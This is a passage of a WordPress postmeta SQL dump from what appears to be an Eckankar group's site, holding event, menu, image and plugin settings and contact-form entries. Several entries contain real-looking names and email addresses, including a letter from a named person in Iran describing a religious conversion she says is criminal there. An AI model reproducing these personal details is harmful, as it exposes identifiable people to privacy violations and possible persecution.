/>\r\n%%blog_name%%</p>\";}}'),(141706,264640,'passster_activate_global_protection',NULL),(141707,264640,'passster_activate_protection',NULL),(141708,264640,'passster_protection_type','password'),(141739,264901,'protect_children',''),(141740,264901,'_menu_item_type','post_type'),(141741,264901,'_menu_item_menu_item_parent','247336'),(141742,264901,'_menu_item_object_id','264437'),(141743,264901,'_menu_item_object','page'),(141744,264901,'_menu_item_target',''),(141745,264901,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(141746,264901,'_menu_item_xfn',''),(141747,264901,'_menu_item_url',''),(179307,264901,'_menu_sgpb_popup_id','0'),(141749,264902,'protect_children',''),(141750,264902,'_menu_item_type','post_type'),(141751,264902,'_menu_item_menu_item_parent','247336'),(141752,264902,'_menu_item_object_id','264430'),(141753,264902,'_menu_item_object','page'),(141754,264902,'_menu_item_target',''),(141755,264902,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(141756,264902,'_menu_item_xfn',''),(141757,264902,'_menu_item_url',''),(179305,264902,'_menu_sgpb_popup_id','0'),(141759,264903,'protect_children',''),(141760,264903,'_menu_item_type','post_type'),(141761,264903,'_menu_item_menu_item_parent','247336'),(141762,264903,'_menu_item_object_id','264416'),(141763,264903,'_menu_item_object','page'),(141764,264903,'_menu_item_target',''),(141765,264903,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(141766,264903,'_menu_item_xfn',''),(141767,264903,'_menu_item_url',''),(179303,264903,'_menu_sgpb_popup_id','0'),(143432,265127,'_field_138','I have been living on the east coast of the United States for a very long time. I start looking at charts at the abundance of woman. I have been very unhappy in my dating life as a single female attract to men. I notice some states out west are predominately men and or more balance. I like to know if something could be done to help me find a helpmate of opposite gender in a better balance area. Is it something that could be done to align my love life. I am attracting gays and married men and it is not been helpful.'),(143431,265127,'_field_137','comment'),(143430,265127,'_field_135','csample76@yahoo.com'),(143429,265127,'_field_134','S'),(143428,265127,'_field_133','Cassandra'),(179346,268204,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:61539;s:12:\"smushed-size\";i:16185;s:15:\"savings-percent\";d:73.7;s:10:\"sizes-info\";a:4:{s:4:\"full\";a:2:{s:8:\"original\";i:61539;s:10:\"compressed\";i:16185;}s:6:\"medium\";a:2:{s:8:\"original\";i:48806;s:10:\"compressed\";i:15792;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:21561;s:10:\"compressed\";i:7577;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:51054;s:10:\"compressed\";i:16030;}}}'),(179343,268204,'original-file','2023/03/free-eck-books-lg-2-1-updraft-pre-smush-original.png'),(141819,247330,'_wp_old_date','2020-01-14'),(179297,247330,'_menu_sgpb_popup_id','0'),(141821,247336,'_wp_old_date','2020-01-14'),(179299,247336,'_menu_sgpb_popup_id','0'),(177222,267955,'mec_booking_location','129'),(177223,267955,'mec_ticket_price_1','0'),(141831,247342,'_wp_old_date','2020-01-14'),(179319,247342,'_menu_sgpb_popup_id','0'),(141833,261921,'_wp_old_date','2020-09-08'),(179321,261921,'_menu_sgpb_popup_id','0'),(141835,247343,'_wp_old_date','2020-01-14'),(179323,247343,'_menu_sgpb_popup_id','0'),(141837,247344,'_wp_old_date','2020-01-14'),(179325,247344,'_menu_sgpb_popup_id','0'),(179330,268201,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:564;s:6:\"height\";i:91;s:4:\"file\";s:27:\"2023/03/newsletter-lg-1.png\";s:8:\"filesize\";i:21615;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:26:\"newsletter-lg-1-300x48.png\";s:5:\"width\";i:300;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:11540;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:26:\"newsletter-lg-1-150x91.png\";s:5:\"width\";i:150;s:6:\"height\";i:91;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:6359;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:26:\"newsletter-lg-1-300x91.png\";s:5:\"width\";i:300;s:6:\"height\";i:91;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:12505;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:26:\"newsletter-lg-1-474x91.png\";s:5:\"width\";i:474;s:6:\"height\";i:91;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:19270;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:26:\"newsletter-lg-1-391x91.png\";s:5:\"width\";i:391;s:6:\"height\";i:91;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:16298;}s:8:\"tileview\";a:5:{s:4:\"file\";s:26:\"newsletter-lg-1-300x91.png\";s:5:\"width\";i:300;s:6:\"height\";i:91;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:12505;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(141841,247345,'_wp_old_date','2020-01-14'),(179309,247345,'_menu_sgpb_popup_id','0'),(177210,267955,'mec_cancellation_key','37fb029f3171a87000dbbbdd98e305aa'),(177211,267955,'mec_confirmed','1'),(177212,267955,'mec_event_id','267730'),(141851,247332,'_wp_old_date','2020-01-14'),(179313,247332,'_menu_sgpb_popup_id','0'),(179390,268208,'mec_repeat_end',''),(179389,268208,'mec_repeat_interval','1'),(179377,268208,'mec_start_date','2023-04-22'),(179376,268208,'mec_public','1'),(179363,268208,'mec_currency','a:0:{}'),(179362,268208,'mec_cost',''),(179353,268208,'protect_children',''),(179349,268206,'original-file','2023/03/footer-9-3-16-23-updraft-pre-smush-original.png'),(179347,268206,'_wp_attached_file','2023/03/footer-9-3-16-23.png'),(143861,265160,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:93806;s:12:\"smushed-size\";i:89045;s:15:\"savings-percent\";d:5.0800000000000000710542735760100185871124267578125;}'),(143890,265198,'mec_start_date','2021-07-07'),(143889,265198,'mec_organizer_id','1'),(143888,265198,'mec_dont_show_map','1'),(143930,265198,'mec_more_info',''),(143929,265198,'mec_read_more',''),(143928,265198,'_edit_last','2'),(143926,265198,'mec_event_date_submit','20210422154949'),(143927,265198,'_edit_lock','1624848207:2'),(143951,265199,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:620;s:6:\"height\";i:348;s:4:\"file\";s:27:\"2021/06/hand-reaching-1.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"hand-reaching-1-300x168.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:168;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"hand-reaching-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:27:\"hand-reaching-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:27:\"hand-reaching-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:27:\"hand-reaching-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:27:\"hand-reaching-1-300x348.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:348;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:27:\"hand-reaching-1-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(143529,265136,'_wp_attached_file','2021/06/elss-notext-2021.jpg'),(143417,265124,'_seq_num','71'),(143415,265124,'_field_138','Dear Sri Harold Klemp, the Mahanta,\nI am Pegah Hashemi Hosseini from Iran country and this is the first time that I’m writing a letter to you by E-mail.\nAbout five years ago I became familiar with Eckankar, by my husband. Then I started reading about Eckankar. I found that I love it and from the past always I had have the inner attraction to it.\nI searched in internet and read more and more about Eckankar and I saw your picture, even I dreamed once that you gave me a book with two coupons to buy books and you told me that I should read books about Eckankar.\nAfter that dream, I started to read some translated books about Eckankar and about you.  After reading a few books, I came to believe in the presence of Light and Sound in all stages of my life from the past to the present.\nCertainly you are aware of all the restrictions imposed on us by the government. We, the people of Iran, don’t have any religious freedom. In our country we have to be Muslim and any change of religion in this country is a crime. \nDue to the religious restrictions that exist in our country, there is no place for Eckankar followers to be able to read books freely and pass discourses. I want to be able to be a member of Eckankar and freely talk about it, about my experiences and dreams and hear the experiences of others, but in this country I do not have that possibility. In my country, even having and reading Eckankar books is a crime.\nFirst of alI, I want to know that do you accept me as a member of Eckankar? And I want to know how I can be a member of Eckankar?  What should I do?\nMy dear Mahanta, I have written this letter for you to show me the way. \nI will be so glad to hear the response from you.\nThis is my E-mail address:  pegah_hashemi1526@yahoo.com\nYou are always with me.\nPegah\n'),(143411,265124,'_field_133','pegah'),(143412,265124,'_field_134','hashemi hosseini'),(168218,267087,'mec_gateway_label','Free'),(168217,267087,'mec_gateway','MEC_gateway_free'),(168216,267087,'mec_price','0'),(142040,264957,'smush-complete','1'),(168208,267087,'mec_other_dates','a:0:{}'),(168209,267087,'mec_attention_time','1662287400:1662291000'),(142027,264651,'original-file','2021/04/eagle-flying-2-updraft-pre-smush-original.jpg'),(142028,264651,'smush-complete','1'),(142029,264651,'smush-info','The file was compressed from 30.11 KB to 28.59 KB saving 5.05 percent using WP-Optimize'),(142030,264651,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:30831;s:12:\"smushed-size\";i:29274;s:15:\"savings-percent\";d:5.04999999999999982236431605997495353221893310546875;}'),(142033,264874,'original-file','2021/05/fb-icon-email-updraft-pre-smush-original.png'),(142034,264874,'smush-complete','1'),(142035,264874,'smush-info','The file was compressed from 1.27 KB to 532 bytes saving 58.98 percent using WP-Optimize'),(142036,264874,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:1297;s:12:\"smushed-size\";i:532;s:15:\"savings-percent\";d:58.97999999999999687361196265555918216705322265625;}'),(142037,264957,'original-file','2021/05/butterfly-flower-1-updraft-pre-smush-original.jpg'),(142041,264957,'smush-info','The file was compressed from 32.79 KB to 31.56 KB saving 3.78 percent using WP-Optimize'),(142042,264957,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:33581;s:12:\"smushed-size\";i:32313;s:15:\"savings-percent\";d:3.779999999999999804600747665972448885440826416015625;}'),(142085,264977,'protect_children',''),(142086,264977,'protect_children',''),(142087,264977,'_edit_lock','1628091440:2'),(142088,264977,'_edit_last','2'),(142089,264977,'mec_color',''),(142090,264977,'mec_location_id','118'),(142091,264977,'mec_dont_show_map','0'),(142092,264977,'mec_organizer_id','1'),(142093,264977,'mec_read_more',''),(142094,264977,'mec_more_info',''),(142095,264977,'mec_more_info_title',''),(142096,264977,'mec_more_info_target','_self'),(142097,264977,'mec_cost',''),(142098,264977,'mec_currency','a:0:{}'),(142099,264977,'mec_additional_organizer_ids','a:0:{}'),(142100,264977,'mec_additional_location_ids','a:0:{}'),(142101,264977,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-06-13\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-06-13\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(142102,264977,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(142103,264977,'mec_certain_weekdays','a:0:{}'),(142104,264977,'mec_allday','0'),(142105,264977,'one_occurrence','0'),(142106,264977,'mec_hide_time','0'),(142107,264977,'mec_hide_end_time','0'),(142108,264977,'mec_comment',''),(142109,264977,'mec_timezone','global'),(142110,264977,'mec_countdown_method','global'),(142111,264977,'mec_public','1'),(142112,264977,'mec_start_date','2021-06-13'),(142113,264977,'mec_start_time_hour','10'),(142114,264977,'mec_start_time_minutes','30'),(142115,264977,'mec_start_time_ampm','AM'),(142116,264977,'mec_start_day_seconds','37800'),(142117,264977,'mec_end_date','2021-06-13'),(142118,264977,'mec_end_time_hour','11'),(142119,264977,'mec_end_time_minutes','30'),(142120,264977,'mec_end_time_ampm','AM'),(142121,264977,'mec_end_day_seconds','41400'),(142122,264977,'mec_repeat_status','0'),(142123,264977,'mec_repeat_type',''),(142124,264977,'mec_repeat_interval','1'),(142125,264977,'mec_repeat_end',''),(142126,264977,'mec_repeat_end_at_occurrences',''),(142127,264977,'mec_repeat_end_at_date',''),(142128,264977,'mec_advanced_days','a:0:{}'),(142129,264977,'mec_in_days',''),(142130,264977,'mec_not_in_days',''),(142131,264977,'mec_hourly_schedules','a:0:{}'),(142132,264977,'mec_booking','a:0:{}'),(142133,264977,'mec_tickets','a:0:{}'),(142134,264977,'mec_fees_global_inheritance','1'),(142135,264977,'mec_fees','a:0:{}'),(142136,264977,'mec_ticket_variations_global_inheritance','1'),(142137,264977,'mec_ticket_variations','a:0:{}'),(142138,264977,'mec_reg_fields_global_inheritance','1'),(142139,264977,'mec_reg_fields','a:0:{}'),(142140,264977,'mec_bfixed_fields','a:0:{}'),(142141,264977,'mec_op','a:0:{}'),(142142,264977,'mec_fields','a:0:{}'),(142143,264977,'mec_event_status','EventScheduled'),(142144,264977,'mec_moved_online_link',''),(142145,264977,'mec_cancelled_reason',''),(142146,264977,'mec_display_cancellation_reason_in_single_page',''),(142147,264977,'boldgrid_hide_page_title','0'),(142149,264977,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(142150,264977,'passster_activate_global_protection',NULL),(142151,264977,'passster_activate_protection',NULL),(142152,264977,'passster_protection_type','password'),(143288,264977,'sg_popup_target_custom','a:1:{i:0;s:6:\"264857\";}'),(143289,264977,'sgpb_popup_events_custom','a:1:{i:264857;a:1:{i:0;s:5:\"click\";}}'),(142169,264977,'_thumbnail_id','265108'),(143559,265137,'smush-info','The file was compressed from 91.33 KB to 86.32 KB saving 5.49 percent using WP-Optimize'),(143556,265137,'original-file','2021/06/generic-event-notext-2021-updraft-pre-smush-original.jpg'),(143554,265136,'smush-info','The file was compressed from 97.94 KB to 93.63 KB saving 4.4 percent using WP-Optimize'),(143555,265136,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:100286;s:12:\"smushed-size\";i:95878;s:15:\"savings-percent\";d:4.4000000000000003552713678800500929355621337890625;}'),(150948,265939,'_wp_attached_file','2021/11/podcast-bk-2.jpg'),(150949,265939,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1283;s:6:\"height\";i:638;s:4:\"file\";s:24:\"2021/11/podcast-bk-2.jpg\";s:5:\"sizes\";a:9:{s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"podcast-bk-2-300x149.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:149;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"podcast-bk-2-1024x509.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:509;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"podcast-bk-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"podcast-bk-2-768x382.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:24:\"podcast-bk-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:24:\"podcast-bk-2-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:24:\"podcast-bk-2-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:24:\"podcast-bk-2-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:24:\"podcast-bk-2-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(143528,265135,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:720;s:6:\"height\";i:385;s:4:\"file\";s:32:\"2021/06/bookdisc-notext-2021.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"bookdisc-notext-2021-300x160.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"bookdisc-notext-2021-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:32:\"bookdisc-notext-2021-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:32:\"bookdisc-notext-2021-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:32:\"bookdisc-notext-2021-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:32:\"bookdisc-notext-2021-300x385.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"bookdisc-notext-2021-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(143526,265134,'passster_protection_type','password'),(143527,265135,'_wp_attached_file','2021/06/bookdisc-notext-2021.jpg'),(143553,265136,'smush-complete','1'),(143539,265134,'sg_popup_target_custom','a:1:{i:0;s:6:\"264853\";}'),(143540,265134,'sgpb_popup_events_custom','a:1:{i:264853;a:1:{i:0;s:5:\"click\";}}'),(143543,265139,'smush-info','The file was compressed from 79.62 KB to 79.62 KB saving 0 percent using WP-Optimize'),(143547,265139,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:81534;s:12:\"smushed-size\";i:81534;s:15:\"savings-percent\";d:0;}'),(143544,265139,'smush-complete','1'),(143548,265138,'original-file','2021/06/rountable-notext-2021-updraft-pre-smush-original.jpg'),(143549,265138,'smush-info','The file was compressed from 78.05 KB to 73.99 KB saving 5.21 percent using WP-Optimize'),(143551,265138,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:79921;s:12:\"smushed-size\";i:75761;s:15:\"savings-percent\";d:5.20999999999999996447286321199499070644378662109375;}'),(143550,265138,'smush-complete','1'),(143552,265136,'original-file','2021/06/elss-notext-2021-updraft-pre-smush-original.jpg'),(143525,265134,'passster_activate_protection',NULL),(143520,265134,'mec_moved_online_link',''),(143519,265134,'mec_event_status','EventScheduled'),(143518,265134,'mec_fields','a:0:{}'),(143513,265134,'one_occurrence','0'),(143512,265134,'mec_additional_location_ids','a:0:{}'),(143507,265134,'mec_more_info_title',''),(143483,265134,'mec_repeat_type',''),(143484,265134,'mec_repeat_interval','1'),(143485,265134,'mec_repeat_end',''),(143486,265134,'mec_repeat_end_at_occurrences',''),(143487,265134,'mec_repeat_end_at_date',''),(143488,265134,'mec_advanced_days','a:0:{}'),(143489,265134,'mec_in_days',''),(143490,265134,'mec_not_in_days',''),(143491,265134,'mec_hourly_schedules','a:0:{}'),(143492,265134,'mec_booking','a:0:{}'),(143493,265134,'mec_tickets','a:0:{}'),(143494,265134,'mec_fees_global_inheritance','1'),(143495,265134,'mec_fees','a:0:{}'),(143496,265134,'mec_ticket_variations_global_inheritance','1'),(143497,265134,'mec_ticket_variations','a:0:{}'),(143502,265134,'_edit_lock','1623941251:2'),(143500,265134,'mec_op','a:0:{}'),(143499,265134,'mec_reg_fields','a:0:{}'),(143482,265134,'mec_repeat_status','0'),(143481,265134,'mec_comment',''),(143480,265134,'mec_hide_end_time','0'),(143478,265134,'mec_allday','0'),(143477,265134,'mec_certain_weekdays','a:0:{}'),(143476,265134,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(143475,265134,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-07-11\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-07-11\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(143474,265134,'mec_end_day_seconds','41400'),(143473,265134,'mec_end_time_ampm','AM'),(143472,265134,'mec_end_time_minutes','30'),(143471,265134,'mec_end_time_hour','11'),(143456,264588,'passster_activate_global_protection',NULL),(143457,264588,'passster_activate_protection',NULL),(143458,264588,'passster_protection_type','password'),(143470,265134,'mec_end_date','2021-07-11'),(143469,265134,'mec_start_day_seconds','37800'),(143468,265134,'mec_start_time_ampm','AM'),(143467,265134,'mec_start_time_minutes','30'),(143466,265134,'mec_start_time_hour','10'),(143465,265134,'mec_start_date','2021-07-11'),(143464,265134,'mec_organizer_id','1'),(143463,265134,'mec_dont_show_map','1'),(143462,265134,'mec_location_id','118'),(143461,265134,'mec_color',''),(143460,265134,'protect_children',''),(143459,265134,'protect_children',''),(143423,265126,'_field_425','Rolf'),(143422,265125,'_seq_num','21'),(143421,265125,'_form_id','46'),(143418,265125,'_field_425','Gwen'),(146737,265639,'mec_display_cancellation_reason_in_single_page',''),(146738,265639,'boldgrid_hide_page_title','0'),(146739,265639,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(146736,265639,'mec_cancelled_reason',''),(146735,265639,'mec_moved_online_link',''),(149503,265891,'_field_137','event emails'),(149501,265891,'_field_134','Fischer'),(149502,265891,'_field_135','mfischerak@gmail.com'),(149500,265891,'_field_133','Michael'),(169127,267185,'passster_activate_global_protection',NULL),(149491,265889,'_seq_num','14'),(149487,265889,'_field_402','Michael'),(149486,265888,'_seq_num','88'),(169136,267186,'protect_children',''),(169137,267186,'mec_color',''),(169135,267185,'_edit_last','15'),(149483,265888,'_field_137','Satsang Participation Eligibility'),(149482,265888,'_field_135','sah50ish@yahoo.com'),(149481,265888,'_field_134','HARTMAN'),(149480,265888,'_field_133','SHERRYL'),(169134,267185,'_edit_lock','1662689535:15'),(149485,265888,'_form_id','13'),(169132,267185,'_thumbnail_id','266189'),(169133,267185,'_dp_original','267043'),(145445,265432,'mec_moved_online_link',''),(145446,265432,'mec_cancelled_reason',''),(145447,265432,'mec_display_cancellation_reason_in_single_page',''),(145448,265432,'boldgrid_hide_page_title','0'),(145449,265432,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(145450,265432,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-09-01\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-09-01\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(145451,265432,'mec_currency','a:0:{}'),(145452,265432,'mec_additional_organizer_ids','a:0:{}'),(145453,265432,'mec_additional_location_ids','a:0:{